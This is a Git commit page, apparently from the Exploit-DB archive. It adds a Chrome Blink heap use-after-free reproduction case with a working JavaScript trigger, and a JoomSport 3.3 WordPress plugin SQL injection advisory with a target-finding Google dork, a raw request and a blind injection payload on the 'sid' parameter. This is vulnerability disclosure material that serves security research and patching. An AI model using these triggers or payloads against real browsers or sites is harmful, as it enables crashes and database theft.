DB: 2019-08-08

2 changes to exploits/shellcodes Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability WordPress Plugin JoomSport 3.3 - SQL Injection
ss18 · Aug 8, 2019 · 44a9c2c · 44a9c2c
1 parent fe9103a
commit 44a9c2c
Show file tree

Hide file tree

Showing 3 changed files with 95 additions and 0 deletions.
diff --git a/exploits/multiple/dos/47211.html b/exploits/multiple/dos/47211.html
@@ -0,0 +1,47 @@
+<!--
+VULNERABILITY DETAILS
+void PresentationAvailabilityState::UpdateAvailability(
+    const KURL& url,
+    mojom::blink::ScreenAvailability availability) {
+[...]
+  {
+    // Set |iterating_listeners_| so we know not to allow modifications
+    // to |availability_listeners_|.
+    base::AutoReset<bool> iterating(&iterating_listeners_, true);
+    for (auto& listener_ref : availability_listeners_) {
+      auto* listener = listener_ref.get();
+      if (!listener->urls.Contains<KURL>(url))
+        continue;
+
+      auto screen_availability = GetScreenAvailability(listener->urls);
+      DCHECK(screen_availability != mojom::blink::ScreenAvailability::UNKNOWN);
+      for (auto* observer : listener->availability_observers)
+        observer->AvailabilityChanged(screen_availability); // ***1***
+[...]
+
+`PresentationAvailabilityObserver::AvailabilityChanged` might call a user-defined JS event handler,
+which in turn might modify `availability_observers` and invalidate the `for` loop's iterator.
+
+VERSION
+Chromium 74.0.3729.0 (Developer Build) (64-bit)
+Chromium 76.0.3789.0 (Developer Build) (64-bit)
+
+REPRODUCTION CASE
+Note that you need an extra display connected to your machine to reproduce the bug, otherwise
+`UpdateAvailability` won't be called.
+-->
+
+<body>
+<script>
+frame = document.body.appendChild(document.createElement("iframe"));
+request = new frame.contentWindow.PresentationRequest([location]);
+request.getAvailability().then(availability => {
+  availability.onchange = () => frame.remove();
+});
+</script>
+</body>
+
+<!--
+CREDIT INFORMATION
+Sergei Glazunov of Google Project Zero.
+-->
diff --git a/exploits/php/webapps/47210.txt b/exploits/php/webapps/47210.txt
@@ -0,0 +1,46 @@
+# Exploit Title: JoomSport 3.3 – for Sports - SQL injection
+# Google Dork: intext:powered by JoomSport - sport WordPress plugin
+# Date:29/07/2019.
+# Exploit Author: Pablo Santiago
+# Vendor Homepage: https://beardev.com/
+# Software Link: https://wordpress.org/plugins/joomsport-sports-league-results-management/
+# Version: 3.3
+# Tested on: Windows and Kali linux
+# CVE :2019-14348
+# References: https://hackpuntes.com/cve-2019-14348-joomsport-for-sports-sql-injection/
+
+# 1. Technical Description:
+#Through the SQL injection vulnerability, a malicious user could
+inject SQL code in order to steal information from the database,
+modify data from the database, even delete database or data from
+them.
+
+#2.  Request: All requests that contains the parameter sid are
+vulnerables to SQL injection
+
+POST /wordpress/joomsport_season/new-yorkers/?action=playerlist HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0)
+Gecko/20100101 Firefox/67.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/wordpress/joomsport_season/new-yorkers/?action=playerlist
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 22
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=s010flbg7fbohnguabsvjaut40
+Upgrade-Insecure-Requests: 1
+
+sid=1&page=1&jscurtab=
+
+# 3. Payload:
+
+Parameter: sid (POST)
+   Type: boolean-based blind
+   Title:  Or boolean-based blind - WHERE or HAVING clause
+   Payload: sid=-3506 OR 7339=7339&page=1jscurtab=
+
+# 4. Reference:
+# https://hackpuntes.com/cve-2019-14348-joomsport-for-sports-sql-injection/
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -6521,6 +6521,7 @@ id,file,description,date,author,type,platform,port
 47193,exploits/multiple/dos/47193.txt,"iMessage - Memory Corruption when Decoding NSKnownKeysDictionary1",2019-07-30,"Google Security Research",dos,multiple,
 47194,exploits/multiple/dos/47194.txt,"iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects",2019-07-30,"Google Security Research",dos,multiple,
 47207,exploits/macos/dos/47207.txt,"macOS iMessage - Heap Overflow when Deserializing",2019-08-05,"Google Security Research",dos,macos,
+47211,exploits/multiple/dos/47211.html,"Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability",2019-08-07,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41577,3 +41578,4 @@ id,file,description,date,author,type,platform,port
 47204,exploits/php/webapps/47204.txt,"Sar2HTML 3.2.1 - Remote Command Execution",2019-08-02,"Cemal Cihad ÇİFTÇİ",webapps,php,80
 47205,exploits/php/webapps/47205.txt,"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection",2019-08-02,n1x_,webapps,php,80
 47206,exploits/php/webapps/47206.txt,"1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting",2019-08-02,"Kusol Watchara-Apanukorn",webapps,php,80
+47210,exploits/php/webapps/47210.txt,"WordPress Plugin JoomSport 3.3 - SQL Injection",2019-08-07,"Pablo Santiago",webapps,php,80